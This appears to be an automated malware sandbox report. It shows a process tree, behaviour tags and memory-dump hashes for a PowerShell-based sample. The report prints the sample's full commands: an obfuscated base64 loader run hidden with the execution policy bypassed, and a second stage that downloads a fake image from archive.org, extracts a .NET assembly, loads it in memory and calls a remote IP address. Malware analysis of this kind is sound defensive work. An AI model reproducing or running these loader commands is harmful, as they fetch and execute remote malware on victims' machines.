⨻HY⦢ ⚈ ⇖ ⮫ ⨻ZQBy⦢ ⚈ ⇖ ⮫ ⨻HQ⦢ ⚈ ⇖ ⮫ ⨻XQ⦢ ⚈ ⇖ ⮫ ⨻6⦢ ⚈ ⇖ ⮫ ⨻Do⦢ ⚈ ⇖ ⮫ ⨻RgBy⦢ ⚈ ⇖ ⮫ ⨻G8⦢ ⚈ ⇖ ⮫ ⨻bQBC⦢ ⚈ ⇖ ⮫ ⨻GE⦢ ⚈ ⇖ ⮫ ⨻cwBl⦢ ⚈ ⇖ ⮫ ⨻DY⦢ ⚈ ⇖ ⮫ ⨻N⦢ ⚈ ⇖ ⮫ ⨻BT⦢ ⚈ ⇖ ⮫ ⨻HQ⦢ ⚈ ⇖ ⮫ ⨻cgBp⦢ ⚈ ⇖ ⮫ ⨻G4⦢ ⚈ ⇖ ⮫ ⨻Zw⦢ ⚈ ⇖ ⮫ ⨻o⦢ ⚈ ⇖ ⮫ ⨻CQ⦢ ⚈ ⇖ ⮫ ⨻YgBh⦢ ⚈ ⇖ ⮫ ⨻HM⦢ ⚈ ⇖ ⮫ ⨻ZQ⦢ ⚈ ⇖ ⮫ ⨻2⦢ ⚈ ⇖ ⮫ ⨻DQ⦢ ⚈ ⇖ ⮫ ⨻QwBv⦢ ⚈ ⇖ ⮫ ⨻G0⦢ ⚈ ⇖ ⮫ ⨻bQBh⦢ ⚈ ⇖ ⮫ ⨻G4⦢ ⚈ ⇖ ⮫ ⨻Z⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻p⦢ ⚈ ⇖ ⮫ ⨻Ds⦢ ⚈ ⇖ ⮫ ⨻J⦢ ⚈ ⇖ ⮫ ⨻Bs⦢ ⚈ ⇖ ⮫ ⨻G8⦢ ⚈ ⇖ ⮫ ⨻YQBk⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻Z⦢ ⚈ ⇖ ⮫ ⨻BB⦢ ⚈ ⇖ ⮫ ⨻HM⦢ ⚈ ⇖ ⮫ ⨻cwBl⦢ ⚈ ⇖ ⮫ ⨻G0⦢ ⚈ ⇖ ⮫ ⨻YgBs⦢ ⚈ ⇖ ⮫ ⨻Hk⦢ ⚈ ⇖ ⮫ ⨻I⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻9⦢ ⚈ ⇖ ⮫ ⨻C⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻WwBT⦢ ⚈ ⇖ ⮫ ⨻Hk⦢ ⚈ ⇖ ⮫ ⨻cwB0⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻bQ⦢ ⚈ ⇖ ⮫ ⨻u⦢ ⚈ ⇖ ⮫ ⨻FI⦢ ⚈ ⇖ ⮫ ⨻ZQBm⦢ ⚈ ⇖ ⮫ ⨻Gw⦢ ⚈ ⇖ ⮫ ⨻ZQBj⦢ ⚈ ⇖ ⮫ ⨻HQ⦢ ⚈ ⇖ ⮫ ⨻aQBv⦢ ⚈ ⇖ ⮫ ⨻G4⦢ ⚈ ⇖ ⮫ ⨻LgBB⦢ ⚈ ⇖ ⮫ ⨻HM⦢ ⚈ ⇖ ⮫ ⨻cwBl⦢ ⚈ ⇖ ⮫ ⨻G0⦢ ⚈ ⇖ ⮫ ⨻YgBs⦢ ⚈ ⇖ ⮫ ⨻Hk⦢ ⚈ ⇖ ⮫ ⨻XQ⦢ ⚈ ⇖ ⮫ ⨻6⦢ ⚈ ⇖ ⮫ ⨻Do⦢ ⚈ ⇖ ⮫ ⨻T⦢ ⚈ ⇖ ⮫ ⨻Bv⦢ ⚈ ⇖ ⮫ ⨻GE⦢ ⚈ ⇖ ⮫ ⨻Z⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻o⦢ ⚈ ⇖ ⮫ ⨻CQ⦢ ⚈ ⇖ ⮫ ⨻YwBv⦢ ⚈ ⇖ ⮫ ⨻G0⦢ ⚈ ⇖ ⮫ ⨻bQBh⦢ ⚈ ⇖ ⮫ ⨻G4⦢ ⚈ ⇖ ⮫ ⨻Z⦢ ⚈ ⇖ ⮫ ⨻BC⦢ ⚈ ⇖ ⮫ ⨻Hk⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻Bl⦢ ⚈ ⇖ ⮫ ⨻HM⦢ ⚈ ⇖ ⮫ ⨻KQ⦢ ⚈ ⇖ ⮫ ⨻7⦢ ⚈ ⇖ ⮫ ⨻CQ⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻B5⦢ ⚈ ⇖ ⮫ ⨻H⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻ZQ⦢ ⚈ ⇖ ⮫ ⨻g⦢ ⚈ ⇖ ⮫ ⨻D0⦢ ⚈ ⇖ ⮫ ⨻I⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻k⦢ ⚈ ⇖ ⮫ ⨻Gw⦢ ⚈ ⇖ ⮫ ⨻bwBh⦢ ⚈ ⇖ ⮫ ⨻GQ⦢ ⚈ ⇖ ⮫ ⨻ZQBk⦢ ⚈ ⇖ ⮫ ⨻EE⦢ ⚈ ⇖ ⮫ ⨻cwBz⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻bQBi⦢ ⚈ ⇖ ⮫ ⨻Gw⦢ ⚈ ⇖ ⮫ ⨻eQ⦢ ⚈ ⇖ ⮫ ⨻u⦢ ⚈ ⇖ ⮫ ⨻Ec⦢ ⚈ ⇖ ⮫ ⨻ZQB0⦢ ⚈ ⇖ ⮫ ⨻FQ⦢ ⚈ ⇖ ⮫ ⨻eQBw⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻K⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻n⦢ ⚈ ⇖ ⮫ ⨻GQ⦢ ⚈ ⇖ ⮫ ⨻bgBs⦢ ⚈ ⇖ ⮫ ⨻Gk⦢ ⚈ ⇖ ⮫ ⨻Yg⦢ ⚈ ⇖ ⮫ ⨻u⦢ ⚈ ⇖ ⮫ ⨻Ek⦢ ⚈ ⇖ ⮫ ⨻Tw⦢ ⚈ ⇖ ⮫ ⨻u⦢ ⚈ ⇖ ⮫ ⨻Eg⦢ ⚈ ⇖ ⮫ ⨻bwBt⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻Jw⦢ ⚈ ⇖ ⮫ ⨻p⦢ ⚈ ⇖ ⮫ ⨻Ds⦢ ⚈ ⇖ ⮫ ⨻J⦢ ⚈ ⇖ ⮫ ⨻Bt⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻Bo⦢ ⚈ ⇖ ⮫ ⨻G8⦢ ⚈ ⇖ ⮫ ⨻Z⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻g⦢ ⚈ ⇖ ⮫ ⨻D0⦢ ⚈ ⇖ ⮫ ⨻I⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻k⦢ ⚈ ⇖ ⮫ ⨻HQ⦢ ⚈ ⇖ ⮫ ⨻eQBw⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻LgBH⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻BN⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻Bo⦢ ⚈ ⇖ ⮫ ⨻G8⦢ ⚈ ⇖ ⮫ ⨻Z⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻o⦢ ⚈ ⇖ ⮫ ⨻Cc⦢ ⚈ ⇖ ⮫ ⨻VgBB⦢ ⚈ ⇖ ⮫ ⨻Ek⦢ ⚈ ⇖ ⮫ ⨻Jw⦢ ⚈ ⇖ ⮫ ⨻p⦢ ⚈ ⇖ ⮫ ⨻C4⦢ ⚈ ⇖ ⮫ ⨻SQBu⦢ ⚈ ⇖ ⮫ ⨻HY⦢ ⚈ ⇖ ⮫ ⨻bwBr⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻K⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻k⦢ ⚈ ⇖ ⮫ ⨻G4⦢ ⚈ ⇖ ⮫ ⨻dQBs⦢ ⚈ ⇖ ⮫ ⨻Gw⦢ ⚈ ⇖ ⮫ ⨻L⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻g⦢ ⚈ ⇖ ⮫ ⨻Fs⦢ ⚈ ⇖ ⮫ ⨻bwBi⦢ ⚈ ⇖ ⮫ ⨻Go⦢ ⚈ ⇖ ⮫ ⨻ZQBj⦢ ⚈ ⇖ ⮫ ⨻HQ⦢ ⚈ ⇖ ⮫ ⨻WwBd⦢ ⚈ ⇖ ⮫ ⨻F0⦢ ⚈ ⇖ ⮫ ⨻I⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻o⦢ ⚈ ⇖ ⮫ ⨻Cc⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻B4⦢ ⚈ ⇖ ⮫ ⨻HQ⦢ ⚈ ⇖ ⮫ ⨻LgBU⦢ ⚈ ⇖ ⮫ ⨻FI⦢ ⚈ ⇖ ⮫ ⨻VgBH⦢ ⚈ ⇖ ⮫ ⨻C8⦢ ⚈ ⇖ ⮫ ⨻O⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻0⦢ ⚈ ⇖ ⮫ ⨻DQ⦢ ⚈ ⇖ ⮫ ⨻Lw⦢ ⚈ ⇖ ⮫ ⨻z⦢ ⚈ ⇖ ⮫ ⨻Dk⦢ ⚈ ⇖ ⮫ ⨻Lg⦢ ⚈ ⇖ ⮫ ⨻0⦢ ⚈ ⇖ ⮫ ⨻DY⦢ ⚈ ⇖ ⮫ ⨻Lg⦢ ⚈ ⇖ ⮫ ⨻3⦢ ⚈ ⇖ ⮫ ⨻Dk⦢ ⚈ ⇖ ⮫ ⨻MQ⦢ ⚈ ⇖ ⮫ ⨻u⦢ ⚈ ⇖ ⮫ ⨻DI⦢ ⚈ ⇖ ⮫ ⨻O⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻v⦢ ⚈ ⇖ ⮫ ⨻C8⦢ ⚈ ⇖ ⮫ ⨻OgBw⦢ ⚈ ⇖ ⮫ ⨻HQ⦢ ⚈ ⇖ ⮫ ⨻d⦢ ⚈ ⇖ ⮫ ⨻Bo⦢ ⚈ ⇖ ⮫ ⨻Cc⦢ ⚈ ⇖ ⮫ ⨻I⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻s⦢ ⚈ ⇖ ⮫ ⨻C⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻JwBk⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻cwBh⦢ ⚈ ⇖ ⮫ ⨻HQ⦢ ⚈ ⇖ ⮫ ⨻aQB2⦢ ⚈ ⇖ ⮫ ⨻GE⦢ ⚈ ⇖ ⮫ ⨻Z⦢ ⚈ ⇖ ⮫ ⨻Bv⦢ ⚈ ⇖ ⮫ ⨻Cc⦢ ⚈ ⇖ ⮫ ⨻I⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻s⦢ ⚈ ⇖ ⮫ ⨻C⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻JwBk⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻cwBh⦢ ⚈ ⇖ ⮫ ⨻HQ⦢ ⚈ ⇖ ⮫ ⨻aQB2⦢ ⚈ ⇖ ⮫ ⨻GE⦢ ⚈ ⇖ ⮫ ⨻Z⦢ ⚈ ⇖ ⮫ ⨻Bv⦢ ⚈ ⇖ ⮫ ⨻Cc⦢ ⚈ ⇖ ⮫ ⨻I⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻s⦢ ⚈ ⇖ ⮫ ⨻C⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻JwBk⦢ ⚈ ⇖ ⮫ ⨻GU⦢ ⚈ ⇖ ⮫ ⨻cwBh⦢ ⚈ ⇖ ⮫ ⨻HQ⦢ ⚈ ⇖ ⮫ ⨻aQB2⦢ ⚈ ⇖ ⮫ ⨻GE⦢ ⚈ ⇖ ⮫ ⨻Z⦢ ⚈ ⇖ ⮫ ⨻Bv⦢ ⚈ ⇖ ⮫ ⨻Cc⦢ ⚈ ⇖ ⮫ ⨻L⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻n⦢ ⚈ ⇖ ⮫ ⨻FI⦢ ⚈ ⇖ ⮫ ⨻ZQBn⦢ ⚈ ⇖ ⮫ ⨻EE⦢ ⚈ ⇖ ⮫ ⨻cwBt⦢ ⚈ ⇖ ⮫ ⨻Cc⦢ ⚈ ⇖ ⮫ ⨻L⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻n⦢ ⚈ ⇖ ⮫ ⨻Cc⦢ ⚈ ⇖ ⮫ ⨻KQ⦢ ⚈ ⇖ ⮫ ⨻p⦢ ⚈ ⇖ ⮫ ⨻⦢ ⚈ ⇖ ⮫ ⨻==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⦢ ⚈ ⇖ ⮫ ⨻','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2452
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TRVG/844/39.46.791.28//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2080

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    b8f6a6b2dc26af615f821cfd9560222f

    SHA1

    a7bea4a559991e0d783e2d867cdf5939774f4484

    SHA256

    46a7b314cb29eb2cb1d83b6565f20addb90eb3829243d76193e33759b970d0f4

    SHA512

    4377fc3b5b2eb16fe1e907c10819d4670efed958487609d27002074f8625ea209197fee3f64e90c6c837145bc5552404968e3ebf1c7a1dc0d1d4197dd835ecfc

    Download Submit

  • memory/2452-4-0x000007FEF644E000-0x000007FEF644F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2452-7-0x000007FEF6190000-0x000007FEF6B2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2452-6-0x00000000021D0000-0x00000000021D8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2452-5-0x000000001B4A0000-0x000000001B782000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2452-8-0x000007FEF6190000-0x000007FEF6B2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2452-9-0x000007FEF6190000-0x000007FEF6B2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2452-10-0x000007FEF6190000-0x000007FEF6B2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2452-16-0x000007FEF6190000-0x000007FEF6B2D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2452-17-0x000007FEF6190000-0x000007FEF6B2D000-memory.dmp

    Filesize

    9.6MB

    Download